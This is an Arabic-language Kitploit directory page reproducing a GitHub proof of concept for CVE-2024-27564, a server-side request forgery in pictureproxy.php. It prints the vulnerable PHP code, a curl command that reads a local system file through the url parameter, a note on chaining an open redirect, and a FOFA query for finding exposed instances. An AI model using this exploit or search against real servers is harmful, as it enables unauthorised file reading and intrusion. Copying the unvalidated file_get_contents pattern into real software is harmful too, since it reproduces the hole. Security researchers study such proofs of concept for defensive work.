Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SSRF-Exploit-CVE-2024-27564 — إثبات المفهوم لثغرة CVE-2024-27564، توضح هجوم SSRF عبر معامل URL غير موثق في pictureproxy.php. يتضمن اختبارًا باستخدام curl وبحث FOFA عن الحالات الضعيفة. | Kitploit
أدوات/GitHubGitHub/chaudhrymuhammadtayab/ssrf-exploit-cve-2024-27564
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubchaudhrymuhammadtayab/ssrf-exploit-cve-2024-27564

SSRF-Exploit-CVE-2024-27564

إثبات المفهوم لثغرة CVE-2024-27564، توضح هجوم SSRF عبر معامل URL غير موثق في pictureproxy.php. يتضمن اختبارًا باستخدام curl وبحث FOFA عن الحالات الضعيفة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

SSRF-Exploit-CVE-2024-27564

عنوان المشروع

يوضح هذا المشروع ثغرة من نوع تزوير الطلب من جانب الخادم (SSRF) في ملف pictureproxy.php.

الوصف

تسمح ثغرة في ملف pictureproxy.php للمهاجمين عن بُعد بتنفيذ طلبات عشوائية عن طريق حقن عناوين URL في المعامل url. يمكن استغلال ثغرة SSRF هذه دون الحاجة إلى مصادقة، مما يجعلها خطيرة بشكل خاص.

الكود الضعيف موجود في ملف pictureproxy.php. تحدث المشكلة لأن الدالة لا تتحقق بشكل صحيح من المعامل url. يتم تمرير المتغير $_GET['url'] إلى الدالة file_get_contents()، التي تجلب المحتوى من عنوان URL المحدد. قد يؤدي هذا إلى SSRF.

إثبات المفهوم

فيما يلي إثبات مفهوم بسيط يوضح كيف يمكن استغلال الثغرة:

root@kitploit:~
<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

لاختبار الثغرة، يمكنك استخدام أمر curl التالي:

root@kitploit:~
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password

تم الاختبار باستخدام إعادة التوجيه المفتوحة

اختبار باستخدام ثغرة إعادة توجيه مفتوحة:

root@kitploit:~
https://64.media.tumblr.com/f07b73b374dc2ff6d5e4dbf39d2a6467/tumblr_nvani31DCm1u5url1o1_1280.jpg

لافتة

الأدوات

  • FOFA: محرك بحث لأجهزة الإنترنت والثغرات. استخدم الأمر التالي للبحث عن النتائج ذات الصلة:
root@kitploit:~
"title="ChatGPT个人专用版""

الخاتمة

يسلط هذا المشروع الضوء على أهمية التحقق السليم من مدخلات المستخدم لتجنب ثغرات SSRF. تأكد دائمًا من فحص المعاملات مثل عناوين URL بدقة قبل معالجتها.

تنزيل الأداة